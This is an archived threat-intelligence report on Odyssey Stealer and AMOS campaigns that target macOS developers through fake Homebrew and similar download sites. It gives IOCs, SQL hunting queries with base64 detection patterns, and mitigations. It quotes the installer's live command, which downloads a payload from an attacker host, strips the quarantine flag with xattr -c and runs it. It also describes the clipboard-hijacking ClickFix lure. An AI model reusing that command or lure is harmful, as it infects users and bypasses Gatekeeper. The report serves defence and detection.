{
	"id": "71bce997-7708-401f-9105-c6784dfc2df6",
	"created_at": "2026-04-06T00:15:00.50752Z",
	"updated_at": "2026-04-10T13:12:03.438636Z",
	"deleted_at": null,
	"sha1_hash": "d2187fee126028c218a8a4a9f07f6d8b453bb01a",
	"title": "Odyssey Stealer \u0026 AMOS Hit macOS Developers with Fake Homebrew Sites",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2653144,
	"plain_text": "Odyssey Stealer \u0026 AMOS Hit macOS Developers with Fake\r\nHomebrew Sites\r\nPublished: 2025-10-16 · Archived: 2026-04-05 22:32:01 UTC\r\nIn recent months, our threat hunting team has observed a surge in macOS-targeted campaigns employing new\r\nsocial engineering tactics and persistent infrastructure.\r\nThis operation stands out for its focus on the developer community, leveraging trust in common tools and open-source platforms to lure victims into executing malicious code. Rather than relying on brute force or zero-day\r\nexploits, the operators use finely crafted deception: fake download portals, clipboard manipulation, and command\r\nobfuscation.\r\nThis report explains how those techniques deliver Odyssey Stealer and AMOS, and maps the related\r\ninfrastructure, domains, and payload behavior.\r\nKey Takeaways\r\nMain findings from the campaign:\r\nThe campaign targets macOS users, particularly developers, through fake software download websites\r\nimpersonating trusted platforms such as Homebrew, TradingView, and LogMeIn.\r\nAttackers use social engineering by prompting visitors to paste base64-encoded commands in Terminal,\r\nwhich downloads a secondary payload from remote infrastructure.\r\nThe downloaded payload installs either Odyssey Stealer or AMOS (Atomic macOS Stealer), both capable\r\nof harvesting system information, browser data, and cryptocurrency credentials.\r\nMore than 85 phishing domains were identified, connected through shared SSL certificates, payload\r\nservers, and reused infrastructure.\r\nThe infrastructure includes long-standing IP addresses (93.152.230[.]79 and 195.82.147.38) registered\r\nunder a personal name, showing signs of multi-year activity and infrastructure reuse.\r\nThe findings suggest a coordinated and ongoing campaign in which operators continuously adapt their\r\ninfrastructure and tactics to maintain persistence and evade detection within the macOS ecosystem.\r\nThese findings began with a single lead to the first infrastructure node.\r\nInitial Discovery\r\nThe investigation began when cybersecurity researcher Raaz (@solostalking) publicly shared evidence of several\r\nfake websites distributing Odyssey Stealer targeting macOS users. The post drew attention to multiple suspicious\r\nhttps://hunt.io/blog/macos-odyssey-amos-malware-campaign\r\nPage 1 of 22\n\ndomains and revealed a particularly significant detail and IP address (93.152.230[.]79) observed in passive DNS\r\nreplication records, suggesting it was part of the campaign's operational infrastructure.\r\nThe impersonated platforms stood out. These were not random selections; the sites were crafted to mimic\r\nHomebrew, one of the most trusted and widely used package managers in the macOS developer community.\r\nAmong the domains identified were:\r\nhomebrewonline[.]org\r\nhomebrewupdate[.]org\r\nlogmeeine[.]com\r\nPassive DNS data showed these domains were part of an interconnected network. This finding suggested that the\r\nexposed servers likely supported additional, undiscovered phishing or distribution sites operating under the same\r\nmalicious infrastructure.\r\nThe discovery served as the foundation for our subsequent technical analysis, which focused on identifying\r\ndomain overlaps, encoded payloads, and behavioral indicators linking this activity across multiple campaigns.\r\nhttps://hunt.io/blog/macos-odyssey-amos-malware-campaign\r\nPage 2 of 22\n\nFigure 1: Fake Homebrew and LogMeIn download pages used to distribute Odyssey Stealer.\r\nFrom there, we examined the supporting infrastructure.\r\nInfrastructure Analysis and Reuse\r\nFollowing the identification of the suspicious IP address 93.152.230[.]79 originally linked to fake Homebrew\r\ndownload sites by researcher Raaz (@solostalking), our team conducted a deeper investigation into the underlying\r\ninfrastructure. What began as a routine IP lookup quickly uncovered signs of a broader and more organized\r\nnetwork supporting malicious distribution activity.\r\nThe lookup immediately raised several red flags. Unlike legitimate development or hosting environments that\r\ntypically rely on major providers such as AWS, Google Cloud, or Microsoft Azure, this host was registered under\r\nan individual named Shereverov Marat Ahmedovich, based in Helsinki, Finland.\r\nhttps://hunt.io/blog/macos-odyssey-amos-malware-campaign\r\nPage 3 of 22\n\nThis registration detail is unusual. Legitimate organizations rarely operate production servers under personal\r\nnames, especially when impersonating well-known open-source projects like Homebrew. The irregular\r\nregistration, combined with the \"High Risk\" reputation label assigned by Hunt.io, is consistent with prior abusive\r\nactivity observed on this host.\r\nFigure 2: Hunt.io infrastructure view of IP 93.152.230[.]79 showing active services.\r\nFurther inspection of historical service records revealed multiple active network services running on the same\r\nhost:\r\nPort 80 (HTTP) has been active since September 2023, likely serving phishing or payload delivery pages.\r\nPort 22 (SSH) has also been active since September 2023, suggesting direct administrative access for\r\nremote control or maintenance.\r\nPort 21 (FTP) was first observed in July 2025, potentially used for hosting or transferring payload\r\ncomponents.\r\nThe combination of web, SSH, and FTP services persisting across multiple years suggests this server functioned\r\nas a central hub for both command-and-control and payload distribution within the broader campaign\r\ninfrastructure.\r\nThe introduction of FTP services in mid-2025 aligns with the period during which Odyssey Stealer activity\r\nnotably increased. This timing aligns with the observed rise in Odyssey Stealer activity. While this alignment is\r\nnot definitive proof of direct linkage, it strengthens the hypothesis that the same infrastructure evolved to support\r\nthe expanding campaign.\r\nhttps://hunt.io/blog/macos-odyssey-amos-malware-campaign\r\nPage 4 of 22\n\nFigure 3: Timeline of IP 93.152.230[.]79 showing persistent activity since 2023.\r\nFurther analysis showed that the host also exposed email services on ports 993 (IMAPS) and 995 (POP3S), both\r\nsecured with SSL certificates issued to trading.example.com .\r\nThe presence of mail services on this infrastructure is notable and may support credential collection or auxiliary\r\ndistribution. These services could have been used for credential harvesting, phishing, or even as auxiliary\r\ndistribution channels for malicious payloads.\r\nIn addition, port 8888 was observed serving a web management interface tied to FASTPANEL, a control panel\r\ncommonly used for managing multiple domains from a single administrative console. Each service returned a\r\ndistinct JARM fingerprint, suggesting custom configurations per service rather than a standardized, mass-deployed setup.\r\nTogether, the data shows a multi-purpose server environment supporting several campaigns.\r\nhttps://hunt.io/blog/macos-odyssey-amos-malware-campaign\r\nPage 5 of 22\n\nPivoting on the certificate issued to trading.example.com uncovered a second host, 195.82.147[.]38 ,\r\npresenting the same SSL certificate on identical IMAPS and POP3S ports. This certificate reuse operationally\r\nlinks the servers, a common operational security oversight that exposes related infrastructure within a threat\r\nnetwork.\r\nHunt.io records show this second IP began using the certificate in June 2025, suggesting it may have served as a\r\nbackup or migration node as the campaign expanded. The repeated use of the same certificate across hosts\r\nreinforces the assessment that operators reused existing infrastructure instead of deploying new systems for each\r\nphase of activity.\r\nFigure 4: SSL correlation linking IPs via reused trading.example.com certificate.\r\nCollectively, the findings show that the operators maintain a small set of multi-purpose servers that support\r\ndifferent campaigns over time. Rather than building new environments, they adapt existing infrastructure by\r\nreusing domains, certificates, and hosting services. This reuse pattern demonstrates persistence and operational\r\nefficiency within their macOS-targeted distribution ecosystem.\r\nDomain Analysis and Social Engineering Themes\r\nDuring the investigation into the IP addresses 93.152.230[.]79 and 195.82.147[.]38 , a pattern of domain\r\nregistrations emerged linking back to the same infrastructure. Historical DNS data revealed several domains that\r\nresolved to these servers at different times, many of which were designed to impersonate legitimate software or\r\ntrading platforms. This demonstrates a consistent reliance on social engineering as part of the attackers'\r\ndistribution strategy.\r\nThe identified domains include:\r\nhomebrewclubs[.]org\r\nhttps://hunt.io/blog/macos-odyssey-amos-malware-campaign\r\nPage 6 of 22\n\nhomebrewfaq[.]org\r\nhomebrewonline[.]org\r\nhomebrewupdate[.]org\r\nlogmeln[.]com\r\nlogmeeine[.]com\r\ntradingviewen[.]com\r\nsites-phantom[.]com\r\nfilmoraus[.]com\r\nSeveral of these domains closely mimic legitimate brands, particularly the Homebrew project, which aligns with\r\nthe fake developer tool distribution tactic seen in the Odyssey Stealer campaign. Others, such as the fake LogMeIn\r\nand TradingView domains, indicate the operators may be targeting a broader set of users, potentially extending\r\ninto the financial sector.\r\nOverlapping Infrastructure Indicators\r\nFurther analysis revealed overlapping SSL certificates, similar JARM fingerprints, and shared resolution histories\r\nbetween these domains. These technical overlaps reinforce the assessment that the same group is behind multiple\r\ncampaigns leveraging a shared infrastructure base.\r\nBrand impersonation, infrastructure reuse, and varied configs indicate an operation capable of running parallel or\r\nevolving activity.\r\nhttps://hunt.io/blog/macos-odyssey-amos-malware-campaign\r\nPage 7 of 22\n\nhttps://hunt.io/blog/macos-odyssey-amos-malware-campaign\r\nPage 8 of 22\n\nFigure 5: Fake Homebrew phishing site tricking macOS developers to install malware.\r\nThe page's JavaScript is engineered to covertly place a base64-encoded installation command into the user's\r\nclipboard when the visible \"Copy\" button is clicked. To discourage manual inspection, the code disables text\r\nselection and the context menu within the install block, making it harder for users to view the raw string.\r\nWhen decoded, the clipboard contents reveal a curl command that fetches a remote script over HTTP and executes\r\nit via bash in the background. After each copy interaction, the script issues a JSON POST to notify.php ,\r\nenabling the operators to track engagement and identify users who completed the copy step.\r\nThe page also uses click-manipulation (ClickFix) techniques to nudge users into pasting and running the encoded\r\ncommand, turning an apparently benign convenience feature into an effective social-engineering vector.\r\nhttps://hunt.io/blog/macos-odyssey-amos-malware-campaign\r\nPage 9 of 22\n\nFigure 6: Malicious JavaScript copying hidden base64 curl command to the clipboard.\r\nTo measure the scale, we executed a structured hunt to identify web pages embedding the encoded curl -s\r\ninstallation pattern. Using the query below, we searched across collected web data for base64 fragments consistent\r\nwith the malicious installer:\r\nSELECT\r\n hostname\r\nFROM\r\n crawler\r\nWHERE\r\n (\r\n body LIKE '%Y3VybCAtcy%'\r\n OR body LIKE '%AgYmFzaCAm%'\r\n )\r\n AND timestamp gt '2025-05-01'\r\n \r\nCopy\r\nhttps://hunt.io/blog/macos-odyssey-amos-malware-campaign\r\nPage 10 of 22\n\nThis hunt returned 85 unique hostnames, revealing widespread reuse of the same base64-encoded payload across\r\nmultiple websites since May 1, 2025. The results show operators relying on centralized payload infrastructure.\r\nFigure 7: Hunt.io results revealing 85 phishing domains using the same installer.\r\nAfter collecting all encoded installation commands and removing duplicates, we decoded each payload to extract\r\nthe underlying delivery URLs and associated IP addresses. The decoded results clustered into several recurring\r\npath patterns, for example, /d/vipx and /d/roberto , and pointed to a small group of hosting servers.\r\nThis uniformity points to a centralized payload infrastructure that supports numerous phishing pages\r\nsimultaneously, rather than isolated one-off deployments. This reuse points to an efficient, stable backend that the\r\nactors rely on.\r\nhttps://hunt.io/blog/macos-odyssey-amos-malware-campaign\r\nPage 11 of 22\n\nFigure 8: Decoded shell commands delivering Odyssey Stealer payloads.\r\nTo identify phishing pages embedding Odyssey Stealer command-and-control (C2) information, we performed a\r\ntargeted query across our web-crawler dataset. The objective was to locate HTML pages containing known\r\nbase64-encoded or plaintext representations of C2 IP addresses and domains.\r\nSELECT\r\n hostname\r\nFROM\r\n crawler\r\nWHERE\r\n (\r\n body LIKE '%NDUuMTQ2LjEzMC4xMzI%'\r\n OR body LIKE '%NDUuMTQ2LjEzMC4xMzE%'\r\n OR body LIKE '%MTg1LjkzLjg5LjYy%'\r\n OR body LIKE '%NDUuMTM1LjIzMi4zMw%'\r\n OR body LIKE '%b2R5c3NleTEudG8%'\r\n OR body LIKE '%b2R5c3NleS1zdC5jb20%'\r\n OR body LIKE '%NS4xOTkuMTY2LjEwMg%'\r\n OR body LIKE '%ODMuMjIyLjE5MC4yMTQ%'\r\n OR body LIKE '%MTk0LjI2LjI5LjIxNw%'\r\n OR body LIKE '%MTg1LjE0Ny4xMjQuMjEy%'\r\n OR body LIKE '%ODguMjE0LjUwLjM%'\r\n )\r\n AND timestamp gt '2025-01-01'\r\nLIMIT 10\r\n \r\nCopy\r\nhttps://hunt.io/blog/macos-odyssey-amos-malware-campaign\r\nPage 12 of 22\n\nThe search matched multiple encoded indicators such as NDUuMTQ2LjEzMC4xMzI and b2R5c3NleTEudG8 while\r\nrestricting results to samples observed after January 1, 2025, ensuring focus on active infrastructure.\r\nThe resulting hostnames were manually reviewed, and where applicable, the associated pages were fetched for\r\nboth static and dynamic payload analysis. This process effectively distilled a large corpus of web data into a high-value subset of phishing pages directly linked to known Odyssey Stealer infrastructure, enabling precise tracking\r\nof ongoing distribution activity.\r\nFigure 9: Search results showing encoded C2 IPs tied to Odyssey Stealer.\r\nAfter mapping the domain ecosystem, we analyzed how these sites functioned in practice to deliver the payloads.\r\nClickFix-style Fake macOS Download Site Delivering AMOS Stealer\r\nhttps://hunt.io/blog/macos-odyssey-amos-malware-campaign\r\nPage 13 of 22\n\nThis is a fake macOS download page crafted to look like a legitimate software portal. It headlines \"Download for\r\nmacOS\" and displays a phony \"Verified Publisher\" badge to create a false sense of trust.\r\nInstallation instructions and separate .dmg buttons for different macOS versions add to the page's authenticity, and\r\ndemo videos and UI polish mimic legitimate developer pages (GitHub-style) to make the lure more convincing.\r\nThe page's goal is social engineering: trick users into pasting and executing a hidden, malicious command.\r\nFigure 10: Fake \"Download for macOS\" portal featuring false trust badges.\r\nA closer look at the fake installer pages reveals how users are tricked into executing malicious commands.\r\nHidden Curl Payload Copied to Clipboard\r\nWhen a user clicks the \"Copy\" button, the page's JavaScript writes a base64-encoded curl command into the\r\nclipboard, priming victims to paste and run it in Terminal. The script includes a fallback using\r\ndocument.execCommand('copy') for older browsers and immediately replaces the button text with a confirmation\r\nto reassure the user. It appears convenient, but the copied string hides a payload URL that users think they're\r\ncopying an installer command, not a link to a malicious script.\r\nThe page also loads analytics and media assets to look legitimate and to track engagement. Combined, these\r\nbehaviors turn a single click into a reliable infection vector by nudging users to execute the decoded install.sh .\r\nhttps://hunt.io/blog/macos-odyssey-amos-malware-campaign\r\nPage 14 of 22\n\nFigure 11: ClickFix JavaScript writing the malicious curl payload to clipboard.\r\nTo understand how widespread this technique was, we searched for similar encoded payload patterns across other\r\npages.\r\nIdentifying Pages Embedding Base64-Encoded Payloads\r\nOur team created an SQL rule to detect phishing websites that embed malicious scripts.\r\nThe query searches crawler data for pages containing both the base64 fragment 5zaA== and the shell command\r\npattern $(curl) , focusing on records collected after May 1, 2025.\r\nSELECT\r\n *\r\nFROM\r\n crawler\r\nWHERE\r\n body LIKE '%5zaA==%'\r\n AND body LIKE '%$(curl%'\r\n AND timestamp gt '2025-05-01'\r\n \r\nCopy\r\nhttps://hunt.io/blog/macos-odyssey-amos-malware-campaign\r\nPage 15 of 22\n\nThis combination helps identify pages hosting encoded payloads or copy/paste commands used to fetch and\r\nexecute remote content, as you can see from the following screenshot.\r\nFigure 12: SQL hunt results identifying phishing sites embedding encoded payloads.\r\nFollowing that trail led us to the installer script itself and the sequence it uses to deploy the payload.\r\nInstaller Retrieval \u0026 Behavior\r\nThe phishing page fetches a small installer script ( install.sh ) from https://bonoud.com/get3/install.sh\r\nand runs it as part of the bogus install flow. That installer contains a short sequence that downloads a payload into\r\n/tmp/update , clears macOS extended attributes, makes the file executable, and then runs it. In plain terms, the\r\nscript executes:\r\ncurl -o /tmp/update https://bonoud.com/get6/update; xattr -c /tmp/update; chmod +x /tmp/update;\r\n/tmp/update\r\nhttps://hunt.io/blog/macos-odyssey-amos-malware-campaign\r\nPage 16 of 22\n\nClearing extended attributes with xattr -c is commonly used to remove the macOS quarantine flag and bypass\r\nGatekeeper prompts, allowing the binary to run without a user warning.\r\nFrom there, we analyzed how the payload executes, hides its activity, and maintains persistence.\r\nExecution and Obfuscation Flow\r\nThe sample payload demonstrates a staged macOS threat that combines environment fingerprinting, privilege\r\nescalation attempts, system enumeration, and service manipulation.\r\nThe overall behavior indicates an actor focused on evasion, gaining elevated privileges, collecting host details to\r\ninform follow-on actions, and disrupting backup or sync mechanisms to hinder recovery and detection.\r\nInitial execution is conducted through a layered shell invocation pattern: /bin/sh spawns /bin/bash , which\r\ninvokes sudo to run /bin/zsh . Finally, it executes the payload from a user-writable path.\r\nThis multi-interpreter chain is consistent with obfuscation tactics designed to complicate process tracing and\r\nevade simple behavioral detections. Running the payload from /Users/run/... rather than a standard system\r\nlocation further suggests that the operator prefers user-space staging to reduce the chance of triggering signature-based controls that focus on system directories.\r\nOne of the most notable stages in that execution chain involves attempts to gain elevated privileges on the system.\r\nPrivilege Escalation Attempts\r\nThe payload explicitly attempts to escalate privileges by invoking sudo /bin/zsh -c /Users/run/\u003cpayload\u003e .\r\nThis indicates the malware either relies on the presence of an admin account or attempts to exploit sudo\r\nconfiguration weaknesses (for example, cached credentials or overly permissive sudoers entries).\r\nElevated privileges would allow the actor to write to protected locations, modify system-wide configurations, and\r\nhide or remove forensic artifacts, so the presence of such sudo invocations should be treated as a high-priority\r\nalert.\r\nFigure 13: Execution trace showing AMOS Stealer privilege escalation via sudo.\r\nBefore execution, the malware performs anti-analysis checks using AppleScript (osascript) to call\r\nsystem_profiler for both memory and hardware data, verifying whether it is running inside a virtualized or\r\nanalysis environment.\r\nAnti-Analysis and Sandbox Checks\r\nhttps://hunt.io/blog/macos-odyssey-amos-malware-campaign\r\nPage 17 of 22\n\nThe script searches for virtualization markers such as \"QEMU\", \"VMware\", or \"KVM\", specific hardware serials\r\nand model identifiers, and other signs like \"Chip: Unknown\" or \"Intel Core 2\"; if any indicator is found, the script\r\nexits with code 100.\r\nThis termination behavior indicates an attempt to avoid running in virtualized analysis environments or on lab\r\nhardware, and therefore, the payload will alter or abort its behavior when it believes it is being observed.\r\nFigure 14: AppleScript anti-analysis logic detecting virtual machines pre-execution.\r\nOnce the checks pass, the malware begins profiling the host and interacting with system services to avoid\r\ndetection.\r\nService Manipulation and Stealth\r\nIn addition to virtualization checks, the payload uses system_profiler SPMemoryDataType and system_profiler\r\nSPHardwareDataType to collect detailed hardware and memory information.\r\nThis enumeration provides model identifiers, serial numbers, CPU type, and RAM details that the operator can use\r\nto profile the victim environment, either to decide whether to continue, to tailor subsequent payload stages, or to\r\nreport environment metadata back to a command-and-control server.\r\nThis telemetry can guide target selection and help avoid low-value environments.\r\nhttps://hunt.io/blog/macos-odyssey-amos-malware-campaign\r\nPage 18 of 22\n\nFigure 15: macOS profiling commands fingerprinting infected hosts.\r\nAs part of its disruptive and stealthy behavior, the malware issues launchctl kill SIGTERM commands targeting\r\nMicrosoft OneDrive updater daemons. Terminating OneDrive update or sync processes is consistent with an intent\r\nto disrupt cloud backup and synchronization, which can reduce the victim's ability to recover files or detect\r\nchanges via cloud logs.\r\nThe sample also interacts with macOS XPC services by launching or invoking components such as nsurlstoraged\r\nand CoreSpotlightService via xpcproxy , a behavior that can serve to blend malicious activity into legitimate\r\nsystem processes or to leverage trusted services for persistence, inter-process communication, or re-triggering\r\nafter reboot.\r\nhttps://hunt.io/blog/macos-odyssey-amos-malware-campaign\r\nPage 19 of 22\n\nFigure 16: Malware interacting with XPC services like nsurlstoraged for stealth.\r\nBased on these behaviors, the following measures can reduce risk.\r\nMitigation Strategies\r\nNetwork \u0026 domain controls: block known malicious domains/IPs at DNS and proxy; monitor outbound\r\nrequests to newly registered hosts and known payload paths.\r\nEndpoint hardening: enable Gatekeeper/notarization and restrict script execution from /tmp and user-writable paths via MDM/EDR policies.\r\nLeast privilege \u0026 sudo policies: remove passwordless sudo and limit admin accounts; require explicit\r\napproval or MFA for privileged operations.\r\nHunting \u0026 detection: hunt for base64 clipboard fragments and sequences like xattr -c; chmod +x\r\nfollowed by executions from /tmp ; correlate with SSL reuse and hosting IPs.\r\nUser awareness: tell devs: never paste commands from untrusted sites and verify installers from official\r\nrepos; provide vetted internal mirrors.\r\nNetwork egress \u0026 proxying: force web egress through a proxy with content inspection and block direct\r\ncurl/wget to unapproved destinations.\r\nIncident response: isolate suspected hosts, preserve memory and logs, and collect installer scripts and\r\ncrawled HTML for forensics.\r\nhttps://hunt.io/blog/macos-odyssey-amos-malware-campaign\r\nPage 20 of 22\n\nTakedown \u0026 intel sharing: share IOCs with registrars and industry partners and request takedowns;\r\nupdate blocklists and threat feeds promptly.\r\nThe following indicators of compromise (IOCs) summarize infrastructure and domains identified during this\r\ncampaign.\r\nConclusion\r\nThe Odyssey Stealer and AMOS campaign highlights how attackers continue to exploit developer trust in both\r\nopen-source and commercial tools to spread macOS malware. By reusing infrastructure, certificates, and familiar\r\ndownload themes, they blur the line between legitimate and malicious software.\r\nAs these tactics evolve, visibility into domain overlap, encoded payloads, and reused certificates becomes critical\r\nfor early detection and response.\r\nIf you want to stay ahead of campaigns like this, book a Hunt.io demo and see how our platform helps uncover\r\nhidden macOS threat infrastructure before it strikes.\r\nOdyssey Stealer \u0026 AMOS IOCs\r\nType IOC Description / Use Context\r\nIP 93.152.230[.]79\r\nBackend hosting/phishing\r\ninfrastructure.\r\nPassive DNS; linked to fake\r\nHomebrew sites\r\nIP 195.82.147[.]38\r\nSecondary host linked via the same\r\nSSL certificate.\r\nCertificate reuse\r\n(trading.example.com)\r\nDomain homebrewonline[.]org\r\nFake Homebrew phishing domain\r\n(payload delivery).\r\nIdentified in passive DNS\r\nDomain homebrewupdate[.]org Fake Homebrew phishing domain. Identified in passive DNS\r\nDomain homebrewclubs[.]org Fake Homebrew phishing domain.\r\nHistorical DNS resolved to\r\ninfra\r\nDomain homebrewfaq[.]org Fake Homebrew phishing domain.\r\nHistorical DNS resolved to\r\ninfra\r\nDomain logmeln[.]com Fake LogMeIn phishing domain.\r\nIdentified during domain\r\nenumeration\r\nDomain logmeeine[.]com\r\nFake LogMeIn phishing domain\r\n(typosquat).\r\nIdentified during domain\r\nenumeration\r\nDomain tradingviewen[.]com Fake TradingView phishing domain.\r\nIdentified during domain\r\nenumeration\r\nhttps://hunt.io/blog/macos-odyssey-amos-malware-campaign\r\nPage 21 of 22\n\nType IOC Description / Use Context\r\nDomain sites-phantom[.]com Phishing/impersonation domain.\r\nIdentified during domain\r\nenumeration\r\nDomain filmoraus[.]com Phishing/impersonation domain.\r\nIdentified during domain\r\nenumeration\r\nWe will keep monitoring for domain reuse and certificate overlap to surface the next wave of activity.\r\nSource: https://hunt.io/blog/macos-odyssey-amos-malware-campaign\r\nhttps://hunt.io/blog/macos-odyssey-amos-malware-campaign\r\nPage 22 of 22",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://hunt.io/blog/macos-odyssey-amos-malware-campaign"
	],
	"report_names": [
		"macos-odyssey-amos-malware-campaign"
	],
	"threat_actors": [
		{
			"id": "08c8f238-1df5-4e75-b4d8-276ebead502d",
			"created_at": "2023-01-06T13:46:39.344081Z",
			"updated_at": "2026-04-10T02:00:03.294222Z",
			"deleted_at": null,
			"main_name": "Copy-Paste",
			"aliases": [],
			"source_name": "MISPGALAXY:Copy-Paste",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434500,
	"ts_updated_at": 1775826723,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d2187fee126028c218a8a4a9f07f6d8b453bb01a.pdf",
		"text": "https://archive.orkl.eu/d2187fee126028c218a8a4a9f07f6d8b453bb01a.txt",
		"img": "https://archive.orkl.eu/d2187fee126028c218a8a4a9f07f6d8b453bb01a.jpg"
	}
}